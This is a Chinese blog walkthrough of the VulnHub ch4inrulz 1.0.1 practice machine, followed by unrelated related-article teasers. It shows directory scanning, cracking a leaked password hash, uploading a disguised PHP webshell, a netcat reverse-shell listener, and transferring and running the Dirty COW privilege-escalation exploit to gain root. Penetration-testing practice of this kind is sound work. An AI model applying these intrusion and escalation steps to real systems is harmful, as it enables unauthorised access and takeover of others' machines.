VulnHub ch4inrulz: 1.0.1

2023-10-24 22:30
文章标签 1.0 vulnhub ch4inrulz

本文主要是介绍VulnHub ch4inrulz: 1.0.1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

一、信息收集

1.扫描开发端口

开发了21、22、80、8011端口

访问80端口

没有发现什么有价值的信息

访问8011端口

目前也没有发现什么有价值的信息

2.扫描目录

几个dirb常用的字典路径
/usr/share/dirb/wordlists/big.txt          #大字典  
/usr/share/dirb/wordlists/common.txt         #公共字典
/usr/share/dirb/wordlists/extensions_common.txt   #常用文件扩展名字典
/usr/share/dirb/wordlists/mutations_common.txt     #备份扩展名
┌──(root💀kali)-[~/桌面]
└─# dirb http://192.168.103.184

发现有一个/development目录

发现需要账号密码登录

所以现在需要信息收集,找账号密码

扫描.bak文件

一般账户密码可能在.bak文件下

尝试扫描一下.bak文件

┌──(root💀kali)-[~/桌面]
└─# dirb http://192.168.103.184 -X .bak

http://192.168.103.184/index.html.bak

┌──(root💀kali)-[~/桌面]
└─# curl http://192.168.103.184/index.html.bak  #读取这个.bak文件
用户名和密码:frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0┌──(root💀kali)-[~/桌面]
└─# john 1.txt
账号密码:
frank:frank!!!

登录成功:

**这是我未完成的工具清单
- 上传工具(已完成但需要安全审查)**

有个上传的地方???最终找到上传的地方!!!

上传完一个.jpg后缀的木马文件,结果:提示上传成功

再扫一下8011端口下的目录
┌──(root💀kali)-[~/桌面]
└─# dirb http://192.168.103.184:8011

发现有这个目录:

/api/index.html目录

试着登录files_api_php目录

试着读下/development/uploader/upload.php目录下的upload.php文件

利用base64编码读取

网站根路径+FRANKuploads/上传文件名

二、漏洞利用

1.利用php脚本反弹shell

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 4444 python -c 'import pty; pty.spawn("/bin/bash")'  #交互式shell
直接查看内核:uname -a

2.脏牛提权

searchsploit Dirty
先下载到本地:cp /usr/share/exploitdb/exploits/linux/local/40839.c ~

先切换到a目录下,a目录有可写权限
然后进行nc端口监听,开始的反弹shell用了4444端口,所以4444不能再用了www-data@ubuntu:/var/a$ nc -l 1234 > 40839.c
nc -l 1234 > 40839.c┌──(root💀kali)-[~/桌面]
└─# nc 192.168.103.184 1234 < 40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty 密码

3.ssh连接登录firefart账号(root权限)

账户:firefart
密码:12345

4.flag

这篇关于VulnHub ch4inrulz: 1.0.1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/278195

相关文章

概率DP (由一道绿题引起的若干问题。目前为一些老题,蒟蒻的尝试学习1.0)

概率DP: 利用动态规划去解决 概率 期望 的题目。 概率DP 求概率(采用顺推) 从 初始状态推向结果,同一般的DP类似,只是经历了概率论知识的包装。 老题: 添加链接描述 题意: 袋子里有w只白鼠,b只黑鼠,A和B轮流从袋子里抓,谁先抓到白色谁就赢。A每次随机抓一只,B每次随机 抓完一只后 会有另外一只随机老鼠跑出来。如果两个人都没有抓到白色,那么B赢。A先抓,问A赢得概率。 w b 均在

从 Hadoop 1.0 到 Hadoop 2.0 ,你需要了解这些

学习大数据,刚开始接触的是 Hadoop 1.0,然后过度到 Hadoop 2.0 ,这里为了书写方便,本文中 Hadoop 1.0 采用 HV1 的缩写方式,Hadoop 2.0 采用 HV2 的缩写方式。 HV1 中不得不提的两个进程:JobTracker 和 TaskTracker。JobTracker 主要负责任务调度和集群资源管理,TaskTracker 主要负责任务执行。在 HV1

【C-实践】文件服务器(1.0)

概述 使用了 tcp + epoll + 进程池,实现文件下载服务器 功能 主要功能:客户端连接服务器,然后自动下载文件 次要功能:客户端接收时显示进度条 启动 启动服务器 1、在bin目录下生成可执行文件 w@Ubuntu20:bin $ gcc ../src/*.c -o server 2、启动服务器 w@Ubuntu20:bin $ ./server

Vulnhub靶场 | DC系列 - DC9

文章目录 DC-9环境搭建渗透测试端口敲门服务 DC-9 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀k

Cmake之1.0版本重要特性及用法实例(八)

简介: CSDN博客专家、《Android系统多媒体进阶实战》一书作者 新书发布:《Android系统多媒体进阶实战》🚀 优质专栏: Audio工程师进阶系列【原创干货持续更新中……】🚀 优质专栏: 多媒体系统工程师系列【原创干货持续更新中……】🚀 优质视频课程:AAOS车载系统+AOSP14系统攻城狮入门视频实战课 🚀 人生格言: 人生从来没有捷径,只有行动才是治疗恐惧

vulnhub靶场-DC2

一、环境配置 1.下载地址:https://www.vulnhub.com/entry/dc-2,311/ 2.靶场配置:Nat模式   更改hosts文件,官网提示需要更改hosts文件才能访问到网站,否则访问不了 kali进入编辑模式vim,添加上自己的靶机ip地址保存即可 vim /etc/hosts 3.攻击机:kali ip:192.168.111.12

Vulnhub靶场 | DC系列 - DC8

文章目录 DC-8环境搭建渗透测试 DC-8 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

xmlSchema 1.0 - 1.4 各个版本免费下载

xmlSchema 1.0 - 1.4 各个版本免费下载: 附网址  http://www.java2s.com/Code/Jar/x/DownloadXmlSchema132jar.htm

Vulnhub靶场 | DC系列 - DC7

文章目录 DC-7环境搭建渗透测试 DC-7 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC4

文章目录 DC-4环境搭建渗透测试 DC-4 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-4,313/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/